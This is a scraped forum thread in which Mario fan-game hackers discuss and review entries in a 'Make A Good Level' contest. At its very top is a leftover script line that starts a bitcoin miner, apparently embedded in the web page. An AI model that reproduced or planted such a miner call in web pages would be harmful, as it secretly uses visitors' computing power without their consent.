miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmbx community

The Talkhaus "Make A Good Level" Contest -- Discussion

they were fun, but now they're done
cc12321

Re: The Talkhaus "Make A Good Level" Contest -- Discussion

Postby cc12321 » 7 years ago

I was hoping for some sort of ghost data for you best time upon re-entering the stage. Don't know how possible that would be though.
. /_\ May the Force
/_\/_\ Be With You

DeadlyLampshade

Postby DeadlyLampshade » 7 years ago

cc12321 wrote:I was hoping for some sort of ghost data for you best time upon re-entering the stage. Don't know how possible that would be though.
Probably would of gone up a rank or 3 if he did that.
"If you want to be taken seriously in the great modern world of ours, you'll need to learn how to face facts, by charging at them with a hammer or a screwdriver, freaking plunging it in the wall, and people will ask you, "what the hell are you doing?", you don't even answer them, you just keep on plugging at the wall, once you get rid of your house in that fashion you'll probably be commited, and you'll be set for life!"
-raocow

alex2
Banned

Postby alex2 » 7 years ago

cc12321 wrote:I was hoping for some sort of ghost data for you best time upon re-entering the stage. Don't know how possible that would be though.
More possible than you think!

This is still my favourite level.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

S.N.N.

Postby S.N.N. » 7 years ago

This is about what I expected (and where I should be placed) for this level.
The only faults I can find with the level is that the garbage did not line up with the windows they were getting thrown out of. The design of the garbage looked uninspired as well.
Another flaw was falling off of the wires when you got hit. I think I mentioned earlier in the thread that, had I cared/been motivated enough, I would have gone back and fixed that up. As for the design of the garbage .. it was literally garbage. I didn't draw graphics for it, so I figured I could pass it off as that.

It's cool to see generally positive comments though. I've thrown in two levels for SMWCP2 which are arguably a lot better than this one was, so if peeps enjoyed this, they'll likely enjoy those two as well.

DeadlyLampshade

It was an awesome level. You did a great job on it.
"If you want to be taken seriously in the great modern world of ours, you'll need to learn how to face facts, by charging at them with a hammer or a screwdriver, freaking plunging it in the wall, and people will ask you, "what the hell are you doing?", you don't even answer them, you just keep on plugging at the wall, once you get rid of your house in that fashion you'll probably be commited, and you'll be set for life!"
-raocow

MrDeePay

Postby MrDeePay » 7 years ago

I still say SNN phoned it in on this level, and that's really saying something when it still manages to outperform most of the entries in the contest.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 7 years ago

MrDeePay wrote:I still say SNN phoned it in on this level, and that's really saying something when it still manages to outperform most of the entries in the contest.
To be fair he'd have more or less the same results in most any smwcentral contests too, I reckon.
the chillaxest of dragonsImage
ImageImage

MrDeePay

Postby MrDeePay » 7 years ago

And I implied otherwise where/when?

raocow
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

You didn't, but I think I misread what you meant! That's okay though.

Point is: SNN stop being good at the smws it makes others look bad.
ImageImage

Cup

Postby Cup » 7 years ago

I have to admit, if this level had "GIMMICK" letters in it, I think the fun factor would go up substantially!

raocow did find a lot of the little offshoots, but the KONG mechanic of the DKC games is one of my all time favorite gimmicks, and what SNN does in his hack captures it in a way dragon coins never could. So yeah, this level was definitely one of my favorites in the contest, but I do feel it'd be a lot more at home in Gimmick.

S.N.N.

Postby S.N.N. » 7 years ago

Cup wrote:I have to admit, if this level had "GIMMICK" letters in it, I think the fun factor would go up substantially!
I figured they would be more filler than anything since the actual code for the letters isn't made yet in my original ROM.

Also raocow, given one of the comments you made halfway through the level ("need to press Down and then Up really quickly") makes me wonder something: you did realize that you actually grab onto the wires automatically, right? Like, you don't need to press Up at all.
Last edited by S.N.N. on 27 May 2012, 19:37, edited 1 time in total.

Giant Ninji

Postby Giant Ninji » 7 years ago

Man; these just keep getting better! I loved that level! It's so atmospheric!

I wonder how the others will go then...

raocow

Nope, I actually never realised mario auto-grabbed!
ImageImage

Argumentable
the biggest shit

Postby Argumentable » 7 years ago

Do you just constantly hold up or something? I remember during ASMT you kept grabbing onto the trees in SS Cotopaxi

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 7 years ago

Not going to lie, this level was really, really nice as far as ambiences go. I quite like cities at night for some reason so I really enjoyed playing this level. Also pretty amazing music. I thought the wires-grabbing mechanic became a bit boring after a while though, especially considering how slow Mario moves while on them.

DeadlyLampshade

I really like the design of this level, nice use of colors.
-raocow

alex2
Banned

Postby alex2 » 7 years ago

Level was pretty meh, honestly. It looked nice visually, but I definitely think S.N.N.'s level tops this one.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

Frozelar
Retired Screamer

Postby Frozelar » 7 years ago

Heck yeah ZMANN, my favorite level designer dude man person! I really liked this level, though I feel like you've done better in the past. Great job still though yep!

Argumentable
the biggest shit

Postby Argumentable » 7 years ago

I felt like the level could've been improved if there was the absence of the bullet generator

AxemJinx

Postby AxemJinx » 7 years ago

The spike usage seemed unnecessary sometimes (though maybe that's just me), and the boss poorly designed- I mean, the dominant strategy for a asymmetrical room like that will be to stay on the safe half until you get an opening- but the level felt pretty solid apart from that.

Giant Ninji

Postby Giant Ninji » 7 years ago

AxemJinx wrote:The spike usage seemed unnecessary sometimes (though maybe that's just me), and the boss poorly designed- I mean, the dominant strategy for a asymmetrical room like that will be to stay on the safe half until you get an opening- but the level felt pretty solid apart from that.
Oh; so I wasn't the only one bothered by non-existent symmetry. I was watching the boss battle while in my mind I'm getting crazy on how there isn't another shower Venus on the Right. And the same with the upside-down one.

Though, that doesn't take away the fact that it is a good level.

ZMann

Postby ZMann » 7 years ago

I really didn't try that hard with this level, to be honest. I just created it for fun and really didn't expect for it to place this high in the competition (I really thought the difficulty would shoot it down).

Still, I'm glad to see my level has been well-received. :)

limepie20

Postby limepie20 » 7 years ago

Rextep:
Level Design
I liked that you based your level off of buster beetle and fake block guy. They are both uncommon but fun enemies. I wish you did a little more with the level design though. There was one part where platforms were made of throwing blocks and I was sure there would be a buster beetle there, but there wasn’t. It could have made for some interesting gameplay. In addition, the buster beetles and pseudo-blocks were separate from each other for the most part. It could’ve been fun to dodge both of them at once and see what kind of crazy gameplay came out of it. The caves didn't have focus. I was fine with the level being half cave, half outside, but almost all of the cave sections were very short and seemed pointless.

Atmosphere
I really liked the palette of the cave.

Functionality
At the end of the first outside section (I think) there was a mound of land you could jump behind, and you couldn’t get stuck there, but it was pretty tedious to get out. It just shouldn't have been there in the first place.
S.N.N.:
Level Design
I found the level pretty fun. I liked the electric wire gimmick. I just wish you had done a little more with it, though because most of the time you were just jumping over enemies. The one place with the chuck throwing baseballs while you were on the wire was creative, and I would’ve liked to see more obstacles like that rather than the same enemies.

Atmosphere
The level looked really nice, and I liked the music. The only problem was fire balls (from the fire flower) had a weird palette.

Functionality
There were a few places with slowdown, and it is odd how the trash doesn’t line up with the windows it’s being thrown out of.
ZMann:
ZMann
Level Design
I thought it was good for the most part. The bullet generator was annoying because it was unpredictable, and I didn’t think the boss was too fair. Wendy already spawns randomly, and you have to watch two different sets of fireballs with different properties.

Paperkoopa

Postby Paperkoopa » 7 years ago

Jolpengammler's level was incredibly well made! I especially loved the fake death because of the invisible coin block. It all seemed so virtual (I guess that's why they called the thing virtual boy) and everything seemed to fit and work. The level-to-player-communication was really good and enemy placement was clever aswell.

Jolpengammler
Jipples, the friendly dog

Postby Jolpengammler » 7 years ago

Wow, you people like my level waaaay more than I do.
Also had very much fun making the level :mrgreen:
"Ban all the facial hair from life." ~ Horikawa Otane, 2014
"You're shitting with me!" ~ Isocitration, 2014
"skype adds think I'm a lady looking for 40 years old men" ~ raocow, 2016
"i always run up and down the stairs because i want to die" ~Isocitration, 2016

Depressed Horse:

Return to “old contests”